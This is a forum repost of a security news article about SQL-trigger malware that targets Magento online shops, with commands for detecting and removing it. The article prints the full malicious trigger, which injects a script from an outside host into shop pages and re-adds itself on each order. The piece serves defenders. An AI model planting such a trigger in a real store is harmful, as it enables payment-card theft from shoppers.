Content: Slate Blackcurrant Watermelon Strawberry Orange Banana Apple Emerald Chocolate Marble
Background: Slate Blackcurrant Watermelon Strawberry Orange Banana Apple Emerald Chocolate Marble
Pattern: Blank Waves Notes Sharp Wood Rockface Leather Honey Vertical Triangles
Welcome to Design Host

Κάντε εγγραφή τώρα εντελώς δωρεάν για να αποκτήσετε πλήρη πρόσβαση στην κοινότητα μας. Μετά την ολοκλήρωση της εγγραφής θα μπορείτε να συνδεθείτε και να δημιουργήσετε νέα θέματα ή να απαντήσετε στα υπάρχοντα. Επίσης θα μπορείτε να αλλάξετε τις πληροφορίες του προφίλ σας και παράλληλα να επικοινωνείτε με άλλα μέλη μέσω προσωπικών μηνυμάτων και πολλά ακόμα! Αυτό το μήνυμα θα αφαιρεθεί αυτόματα μετά την σύνδεση σας στην κοινότητα μας.

NickTheGreek

A new SQL malware Targets online shops running on Magento

1 post in this topic

Security experts have discovered a new SQL malware targeting online shops running on Magento that hides the code in the website’s database.

Security experts have discovered a new strain of malware that is targeted websites raising Russian the Magento eCommerce platform. The novelty is that this is the first a malware that hides the code in the website’s database is completely written in SQL.

The malware is triggered every time a user places a new order, the “SQL trigger” is then executed before the Magento platform even assembles the web page.

The researchers Willem de Groot that first analyzed the SQL malware discovered by Jeroen Boersma explained that this is a significant evolution on the threat landscape.

“The trigger is executed every time a new order is made. The query checks for the existence of the malware in the header, footer, copyright and every CMS block. If absent, it will re-add itself.” reads the blog post published by Willem de Groot.

“This discovery shows we have entered a new phase of malware evolution. Just scanning files is not enough anymore, malware detection methods should now include database analysis.”

magento.jpg?resize=500%2C260

The malware could be used to steal user payment card data belonging to the users of Magento eCommerce websites.

In order to discover the presence of the SQL malware, administrators have to inspect the database searching for suspicious SQL triggers such as containing admin, .js, script or < (html tags).

echo 'SHOW TRIGGERS' | n98-magerun db:console

Once discovered the malicious trigger it is possible to delete it with a command like the following one:

echo "DROP TRIGGER <trigger_name>" | n98-magerun db:console

According to the expert, SQL malware attacks starts with a brute force attack on /rss/catalog/notifystock/ for an otherwise completely patched shop.

Below the pattern discovered by Jeroen Boersma:

TRIGGER `after_insert_order` 
AFTER INSERT ON `sales_flat_order` FOR EACH ROW
BEGIN
	UPDATE core_config_data 
	SET value = IF(
		value LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', 
		value, 
		CONCAT(value, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
	) 
	WHERE path='design/head/includes' 
		OR path='design/footer/absolute_footer' 
		OR path='design/footer/copyright';\

	UPDATE cms_block 
	SET content= IF(
		content LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', 
		content, 
		CONCAT(content, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
	);
END;

de Groot has updated the Magereport and the Malware Scanner to detect this new type of malware.

 

http://securityaffairs.co/wordpress/56373/malware/sql-malware.html

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now